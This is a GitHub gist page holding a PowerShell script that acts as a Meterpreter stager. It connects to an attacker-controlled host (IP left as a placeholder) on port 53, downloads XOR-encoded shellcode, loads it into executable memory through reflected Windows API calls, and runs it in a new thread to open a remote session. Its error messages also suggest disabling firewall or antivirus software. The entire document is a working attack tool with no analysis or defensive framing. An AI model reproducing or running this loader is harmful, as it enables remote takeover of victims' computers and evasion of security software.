Created
September 3, 2019 00:42
-
-
Save jdferrell3/0c8500175b3845954b04349bd22db742 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $IP = 'X.X.X.X' | |
| $Port = 53 | |
| $VirtualAlloc = $null | |
| $CreateThread = $null | |
| $WaitForSingleObject = $null | |
| $XORKEY = 0x50 | |
| function XorByteArr | |
| { | |
| Param | |
| ( | |
| [Parameter(Position = 0, Mandatory = $True)] [Byte[]] $ByteArr, | |
| [Parameter(Position = 1, Mandatory = $True)] [Byte] $XorKey | |
| ) | |
| for($i=0; $i -lt $ByteArr.Length ; $i++) | |
| { | |
| $ByteArr[$i] = $ByteArr[$i] -bxor $XorKey | |
| } | |
| return $ByteArr | |
| } | |
| function Get-ProcAddress | |
| { | |
| Param | |
| ( | |
| [Parameter(Position = 0, Mandatory = $True)] [String] $Module, | |
| [Parameter(Position = 1, Mandatory = $True)] [String] $Procedure | |
| ) | |
| $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | | |
| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } | |
| $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle',[reflection.bindingflags] 'Public, Static', $null, [System.Reflection.CallingConventions]::Any, @([string]), $null) | |
| $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',[reflection.bindingflags] 'Public, Static', $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null) | |
| $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) | |
| $tmpPtr = New-Object IntPtr | |
| $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) | |
| return $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) | |
| } | |
| function Get-DelegateType | |
| { | |
| Param | |
| ( | |
| [OutputType([Type])] | |
| [Parameter( Position = 0)] | |
| [Type[]] | |
| $Parameters = (New-Object Type[](0)), | |
| [Parameter( Position = 1 )] | |
| [Type] | |
| $ReturnType = [Void] | |
| ) | |
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) | |
| $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
| $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) | |
| $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') | |
| $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) | |
| $MethodBuilder.SetImplementationFlags('Runtime, Managed') | |
| Write-Output $TypeBuilder.CreateType() | |
| } | |
| function Get-NeccessaryFuncs | |
| { | |
| $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc | |
| $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [Int], [Int], [Int]) ([IntPtr]) | |
| $Global:VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) | |
| $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread | |
| $CreateThreadDelegate = Get-DelegateType @([IntPtr], [Int], [IntPtr], [IntPtr], [Int], [IntPtr]) ([IntPtr]) | |
| $Global:CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) | |
| $WaitForSingleObjectAddr = Get-ProcAddress Kernel32.dll WaitForSingleObject | |
| $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int]) ([Int]) | |
| $Global:WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) | |
| } | |
| function Copy-ToUnmanagedMem | |
| { | |
| Param | |
| ( | |
| [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $UnmagedMemPointer, | |
| [Parameter(Position = 1, Mandatory = $True)] [Byte[]] $ByteArr, | |
| [Parameter(Position = 2, Mandatory = $True)] [Int] $UnmagedStartInd, | |
| [Parameter(Position = 3, Mandatory = $True)] [Int] $Size | |
| ) | |
| for ($i = 0; $i -lt $Size; $i++) | |
| { | |
| [System.Runtime.InteropServices.Marshal]::WriteByte($UnmagedMemPointer, $i + $UnmagedStartInd, $ByteArr[$i]) | |
| } | |
| } | |
| if ([IntPtr]::size -eq 4) | |
| { | |
| Throw "Running on x86 powershell!" | |
| } | |
| Get-NeccessaryFuncs | |
| $tcpClient = New-Object System.Net.Sockets.TCPClient | |
| Try | |
| { | |
| $connect = $tcpClient.Connect($IP, $Port) | |
| } | |
| Catch [System.Net.Sockets.SocketException] | |
| { | |
| $err = $_.Exception."ErrorCode" | |
| if ($err -eq 10061) | |
| { | |
| Write-Error "No connection could be made because the target machine actively refused it" | |
| Write-Warning "Check availability of the LHOST" | |
| } | |
| elseif ($err -eq 10013) | |
| { | |
| Write-Error "Something blocking access to the 'Connect' method, probably Firewall or AV software" | |
| Write-Warning "Disable it and then relaunch script" | |
| } | |
| exit -1 | |
| } | |
| $stream = $TcpClient.GetStream() | |
| $payloadSizeBuff = New-Object Byte[] -ArgumentList 4 | |
| $Null = $stream.Read($payloadSizeBuff, 0, 4) | |
| [Int]$payloadSize = [System.BitConverter]::ToInt32($payloadSizeBuff, 0) | |
| Write-Output "Payload size - $payloadSize" | |
| [IntPtr]$shellcodeBuff = $VirtualAlloc.Invoke([IntPtr]::Zero, [Math]::Max([Int]($payloadSize + 5), 0x1000 ), 0x3000, 0x40) | |
| [System.Runtime.InteropServices.Marshal]::WriteByte($shellcodeBuff, 0, [Byte]0xBF) | |
| [System.Runtime.InteropServices.Marshal]::WriteIntPtr($shellcodeBuff, 1, $tcpClient.Client.Handle) | |
| $shellcodeBuffTmp = New-Object Byte[] -ArgumentList $payloadSize | |
| [Int]$bytesRead = 0 | |
| While ($payloadSize -gt $bytesRead) | |
| { | |
| [Int]$netAnswerSize = $stream.Read($shellcodeBuffTmp, $bytesRead, $tcpClient.Available) | |
| $bytesRead += $netAnswerSize | |
| } | |
| $shellcodeBuffTmp = XorByteArr $shellcodeBuffTmp $XORKEY | |
| Copy-ToUnmanagedMem $shellcodeBuff $shellcodeBuffTmp 5 $payloadSize | |
| Write-Output "Received payload, run it in a new thread" | |
| $threadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $shellcodeBuff, [IntPtr]::Zero, 0, [IntPtr]::Zero) | |
| if ($threadHandle -ne [IntPtr]::Zero) | |
| { | |
| Write-Output "Successfully created thread!" | |
| Write-Output "Meterpreter session created!" | |
| } | |
| else | |
| { | |
| Write-Error "Thread creation was failed, exit..." | |
| exit -2 | |
| } | |
| $exitReason = $WaitForSingleObject.Invoke($threadHandle, 0xFFFFFFFF) | |
| if ($exitReason -ne 0x0 -or $exitReason -ne 0x80) | |
| { | |
| Write-Error "Termination of the thread was strange (WAIT_TIMEOUT or WAIT_FAILED returned), exit..." | |
| exit -3 | |
| } | |
| $stream.Close() | |
| $stream.Dispose() | |
| $tcpClient.Close() | |
| $tcpClient.Dispose() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment